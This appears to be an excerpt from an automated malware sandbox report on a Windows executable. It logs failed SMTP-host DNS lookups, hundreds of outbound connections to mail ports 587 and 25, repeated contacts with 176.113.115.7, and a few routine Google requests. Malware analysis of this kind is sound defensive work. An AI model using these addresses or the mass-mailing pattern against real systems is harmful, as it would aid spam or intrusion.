                                                Source: unknownDNS traffic detected: query: smtp.plakativ.de replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.cplpetroleum.co.uk replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.lexington1.net replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.chr-experts-team.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.hoyxvv.com replaycode: Name error (3)
                                                Source: global trafficTCP traffic: 192.168.2.11:49803 -> 52.60.87.163:587
                                                Source: global trafficTCP traffic: 192.168.2.11:49804 -> 81.23.32.164:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57652 -> 18.245.46.53:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57653 -> 213.209.1.145:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57654 -> 3.112.99.1:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57655 -> 81.88.58.196:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57656 -> 96.102.18.197:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57657 -> 46.234.112.80:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57658 -> 77.75.78.196:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57659 -> 31.214.178.39:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57660 -> 103.224.182.219:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57662 -> 104.18.189.233:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57664 -> 142.250.153.27:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57665 -> 104.19.239.228:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57667 -> 103.59.46.46:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57668 -> 52.17.152.5:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57670 -> 148.163.129.50:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57671 -> 65.109.49.216:25
                                                Source: global trafficTCP traffic: 192.168.2.11:57673 -> 90.216.128.5:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57674 -> 104.26.12.69:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57676 -> 167.99.248.199:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57678 -> 194.153.145.104:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57679 -> 15.204.31.140:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57680 -> 74.125.71.26:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57682 -> 77.75.79.222:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57683 -> 162.215.2.27:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57684 -> 185.136.64.82:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57686 -> 207.251.194.25:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57694 -> 62.149.188.200:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57695 -> 77.74.177.55:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57699 -> 141.94.139.121:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57700 -> 212.27.48.10:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57706 -> 95.216.46.33:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57705 -> 92.204.80.1:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57707 -> 146.75.122.114:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57708 -> 75.102.22.57:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57710 -> 109.234.162.66:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57712 -> 52.218.56.92:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57714 -> 17.253.142.4:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57715 -> 72.240.1.27:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57717 -> 92.240.253.41:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57721 -> 212.227.15.41:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57722 -> 3.122.230.153:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57723 -> 109.70.130.143:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57724 -> 208.88.137.117:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57727 -> 3.230.199.117:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57728 -> 2.17.100.208:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57730 -> 95.110.169.51:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57732 -> 96.99.227.0:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57735 -> 174.129.25.170:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59829 -> 34.174.238.249:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59832 -> 13.248.169.48:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59833 -> 212.227.0.72:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59830 -> 199.85.66.2:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59834 -> 207.244.97.88:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59836 -> 165.22.201.68:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59841 -> 52.64.198.206:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59848 -> 35.238.57.114:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59849 -> 13.35.58.76:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59858 -> 195.35.13.215:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59859 -> 200.69.22.4:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59860 -> 52.206.191.232:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59862 -> 146.155.96.222:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59863 -> 194.19.134.85:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59865 -> 90.139.102.196:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59868 -> 187.45.240.110:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59869 -> 151.236.219.218:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59870 -> 200.234.204.130:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59871 -> 62.221.208.245:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59875 -> 84.14.11.34:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59876 -> 195.32.69.33:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59881 -> 27.72.194.14:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59883 -> 216.69.141.86:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59885 -> 19.12.97.37:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59887 -> 93.17.128.123:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59892 -> 34.90.43.144:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59897 -> 212.174.74.125:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59901 -> 64.59.128.135:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59902 -> 142.251.9.27:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59903 -> 162.255.118.52:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59904 -> 194.152.32.10:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59906 -> 52.101.41.22:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59907 -> 52.101.164.0:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59914 -> 163.172.240.111:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59915 -> 178.213.66.203:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59916 -> 81.89.58.131:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59917 -> 217.194.8.27:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59919 -> 40.85.218.2:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59921 -> 91.235.52.77:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59924 -> 67.231.148.125:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59928 -> 76.223.67.189:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59929 -> 80.228.23.221:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59938 -> 104.19.255.251:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59939 -> 81.169.145.64:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59940 -> 116.202.56.145:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59942 -> 199.59.243.228:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59947 -> 62.149.128.72:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59948 -> 3.33.147.52:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59949 -> 47.254.33.193:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59953 -> 105.187.224.26:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59955 -> 92.204.80.0:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59956 -> 103.86.78.4:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59957 -> 40.99.150.34:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59958 -> 139.134.5.153:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59963 -> 77.75.78.173:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59969 -> 217.113.224.3:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59970 -> 52.101.73.27:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59971 -> 187.6.211.40:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59983 -> 146.75.118.114:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59984 -> 92.204.80.3:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59989 -> 217.72.192.67:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59991 -> 193.201.172.118:25
                                                Source: global trafficTCP traffic: 192.168.2.11:59994 -> 65.254.248.100:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59997 -> 217.76.132.243:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64524 -> 52.86.6.113:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64525 -> 146.88.239.56:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64535 -> 74.125.200.26:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64536 -> 80.158.67.40:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64542 -> 217.160.72.6:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64543 -> 23.227.38.65:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64544 -> 84.116.6.3:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64545 -> 3.33.139.32:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64546 -> 213.209.1.147:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64549 -> 5.9.65.79:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64550 -> 167.206.148.154:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64555 -> 196.35.198.130:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64556 -> 52.101.99.2:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64557 -> 103.230.107.246:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64562 -> 104.22.64.144:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64567 -> 217.160.184.242:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64570 -> 79.170.40.98:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64580 -> 210.59.230.45:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64581 -> 156.241.224.141:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64582 -> 45.154.183.183:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64584 -> 104.17.71.73:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64587 -> 45.60.72.23:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64590 -> 37.111.152.25:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64594 -> 52.175.28.82:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64604 -> 161.156.29.45:25
                                                Source: global trafficTCP traffic: 192.168.2.11:64607 -> 62.103.146.102:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64608 -> 67.202.217.94:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64612 -> 36.138.168.25:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64616 -> 104.18.2.81:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64621 -> 144.208.64.144:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64633 -> 164.90.197.143:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64636 -> 91.222.8.52:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64640 -> 85.93.219.11:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64645 -> 213.209.1.146:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64650 -> 217.26.49.138:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64660 -> 64.190.63.222:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64665 -> 162.215.212.254:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64666 -> 145.226.46.83:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64670 -> 35.237.212.184:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64671 -> 181.209.27.66:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64675 -> 195.8.66.22:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64676 -> 109.234.165.210:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64678 -> 31.204.93.82:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64681 -> 75.2.126.67:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64682 -> 46.229.230.48:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64684 -> 183.110.214.4:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64685 -> 194.30.0.214:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64686 -> 20.76.201.171:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64689 -> 20.23.151.207:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64690 -> 81.169.145.86:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64692 -> 217.116.0.228:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64697 -> 142.132.166.12:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64702 -> 212.35.60.35:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64703 -> 156.241.15.30:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64708 -> 35.167.11.172:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64709 -> 185.230.212.166:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64722 -> 219.64.12.157:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64725 -> 52.101.42.18:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64726 -> 87.252.1.21:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64728 -> 185.97.217.16:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64730 -> 89.46.106.23:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64731 -> 80.252.97.80:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64735 -> 95.111.239.188:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64741 -> 193.137.45.66:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64746 -> 104.21.112.1:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64748 -> 162.159.205.17:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64749 -> 46.242.144.130:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64753 -> 162.255.118.7:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64754 -> 162.22.250.190:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64758 -> 52.28.153.152:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64760 -> 212.72.229.180:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64763 -> 209.202.254.90:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64772 -> 34.160.13.42:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64774 -> 94.169.2.19:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64777 -> 204.74.99.100:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64782 -> 117.50.20.113:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64794 -> 76.76.21.21:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64796 -> 80.48.169.1:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64797 -> 80.91.55.62:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64798 -> 94.20.74.2:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64800 -> 124.153.64.203:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64804 -> 87.238.28.12:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64805 -> 194.181.228.5:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64809 -> 217.19.248.132:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64815 -> 195.130.132.9:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64820 -> 45.60.85.192:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64822 -> 88.99.165.61:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64824 -> 81.198.164.220:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53660 -> 96.102.167.164:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53677 -> 211.29.132.105:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53684 -> 45.60.245.113:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53691 -> 15.197.225.128:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53692 -> 52.101.10.16:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53693 -> 77.95.250.195:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53696 -> 103.246.18.6:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53708 -> 208.91.197.27:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53709 -> 94.143.220.218:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53710 -> 81.169.145.143:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53714 -> 52.101.10.14:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53718 -> 52.218.102.100:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53720 -> 3.125.131.179:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53721 -> 188.114.97.3:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53722 -> 62.101.76.218:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53728 -> 168.0.132.203:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53731 -> 3.33.130.190:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53738 -> 31.186.18.100:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53739 -> 193.70.18.144:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53751 -> 185.53.178.51:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53759 -> 64.136.53.168:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53766 -> 198.185.159.144:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53767 -> 80.158.66.24:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53770 -> 62.36.20.30:25
                                                Source: global trafficTCP traffic: 192.168.2.11:53771 -> 104.26.5.148:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53772 -> 149.5.31.97:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53776 -> 211.100.47.40:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53778 -> 99.83.253.192:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53875 -> 52.101.73.26:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53876 -> 3.130.253.23:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53888 -> 43.252.166.120:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53909 -> 104.37.34.248:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53911 -> 162.243.151.28:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53918 -> 45.60.33.125:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53922 -> 103.168.172.65:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53927 -> 72.163.4.185:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53929 -> 52.101.145.0:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53930 -> 107.150.100.76:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53941 -> 195.130.131.33:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53947 -> 45.40.151.233:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53956 -> 146.75.123.10:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53958 -> 76.223.84.192:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53961 -> 92.205.50.235:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50526 -> 185.138.56.214:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50527 -> 46.30.213.98:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50531 -> 52.101.137.0:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50536 -> 79.141.193.68:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50547 -> 217.74.65.23:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50554 -> 149.28.121.93:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50558 -> 83.166.143.44:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50559 -> 212.77.100.83:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50560 -> 91.226.98.187:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50565 -> 34.205.242.146:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50566 -> 46.30.213.169:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50575 -> 211.113.80.114:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50577 -> 200.58.112.97:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50578 -> 41.222.53.178:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50580 -> 195.182.6.60:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50581 -> 213.186.33.5:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50585 -> 188.114.96.3:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50586 -> 46.105.46.142:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50596 -> 52.98.241.194:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50600 -> 85.13.130.209:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50604 -> 212.11.225.17:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50608 -> 77.68.93.69:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50609 -> 209.240.204.200:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50610 -> 44.214.199.220:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50615 -> 104.26.6.19:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50617 -> 34.111.176.156:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50626 -> 151.101.2.159:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50632 -> 80.88.84.73:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50645 -> 193.7.207.36:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50646 -> 176.57.65.93:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50649 -> 148.163.149.246:587
                                                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                                                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.42
                                                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.42
                                                Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
                                                Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
                                                Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
                                                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                                                Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
                                                Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C8CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00C8CE44
                                                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKS1yQEIl7bJAQijtskBCKmdygEIr4fLAQiVocsBCIWgzQEIjafNAQjcvc0BCLnKzQEIq9HNAQiK080BCJ3WzQEIp9jNAQj5wNQVGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                                Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                                Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKS1yQEIl7bJAQijtskBCKmdygEIr4fLAQiVocsBCIWgzQEIjafNAQjcvc0BCLnKzQEIq9HNAQiK080BCJ3WzQEIp9jNAQj5wNQVGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                                Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
